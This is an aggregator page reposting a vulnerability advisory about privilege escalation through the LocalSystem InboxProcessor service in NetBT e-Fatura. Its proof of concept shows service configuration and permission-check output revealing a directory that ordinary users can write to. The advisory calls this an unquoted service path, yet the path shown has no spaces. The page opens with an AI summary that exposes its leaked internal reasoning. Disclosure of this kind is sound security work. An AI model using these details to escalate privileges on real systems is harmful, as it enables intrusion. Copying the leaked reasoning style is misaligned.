NetBT e-Fatura 'InboxProcessor' Unquoted Service Path Privilege Escalation
好的,我现在需要帮用户总结一篇文章的内容,控制在一百个字以内。用户提供的文章是关于NetBT e-Fatura软件中的一个漏洞,标题是“NetBT e-Fatura 'InboxProcessor' Unquoted Service Path Privilege Escalation”。作者是Seccops,发现日期是2025年10月3日,厂商链接是https://net-bt.com.tr/e-fatura/,测试版本是2024,测试操作系统是Windows Server 2019 DC。漏洞类型是CWE-428,未引用搜索路径或元素,CVE编号是CVE-2025-14018。 文章描述部分提到这个漏洞允许未经授权的本地用户在系统上执行任意代码,并提升权限。证明概念部分展示了服务配置信息和使用accesschk.exe检查权限的结果,显示BUILTIN\Users等组有读写权限。 用户的要求是要用中文总结,不超过100字,并且不需要特定的开头。因此,我需要提取关键信息:软件名称、漏洞类型、影响(权限提升)、CVE编号和测试环境。 可能的总结结构应该是:软件名称存在未引用服务路径漏洞,导致本地用户提升权限,CVE编号,并提到测试环境。 现在检查字数是否在限制内:“NetBT e-Fatura软件存在未引用服务路径漏洞(CWE-428),允许本地用户提升权限并执行任意代码(CVE-2025-14018),影响Windows Server 2019 DC环境。” 这样大约76个字,符合要求。 </think> NetBT e-Fatura软件存在未引用服务路径漏洞(CWE-428),允许本地用户提升权限并执行任意代码(CVE-2025-14018),影响Windows Server 2019 DC环境。 2025-12-14 22:32:39 Author: cxsecurity.com(查看原文) 阅读量:0 收藏

# Exploit Title: NetBT e-Fatura 'InboxProcessor' Unquoted Service Path Privilege Escalation # Author: Seccops # Discovery Date: 2025-10-03 # Vendor: https://net-bt.com.tr/e-fatura/ # Tested Version: 2024 # Tested on OS: Microsoft Windows Server 2019 DC # Vulnerability Type: CWE-428 Unquoted Search Path or Element # CVE: CVE-2025-14018 Note: Thanks "Levent Sungu" for providing the testing environment. ==================== Description & Impact ==================== This vulnerability allows an unauthorized local user to execute arbitrary code with high privileges on the system. ================ Proof of Concept ================ C:\Users\efatura>sc qc InboxProcessor [SC] QueryServiceConfig SUCCESS SERVICE_NAME: InboxProcessor TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\inetpub\wwwroot\InboxProcessor\Netbt.Inbox.Process.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : InboxProcessor DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Users\efatura\Desktop>accesschk.exe /accepteula -uwdq "C:\inetpub\wwwroot\InboxProcessor\" Accesschk v6.15 - Reports effective permissions for securable objects Copyright (C) 2006-2022 Mark Russinovich Sysinternals - www.sysinternals.com C:\inetpub\wwwroot\InboxProcessor RW BUILTIN\Users RW NT SERVICE\TrustedInstaller RW NT AUTHORITY\SYSTEM RW BUILTIN\Administrators


文章来源: https://cxsecurity.com/issue/WLB-2025120010
如有侵权请联系:admin#unsafe.sh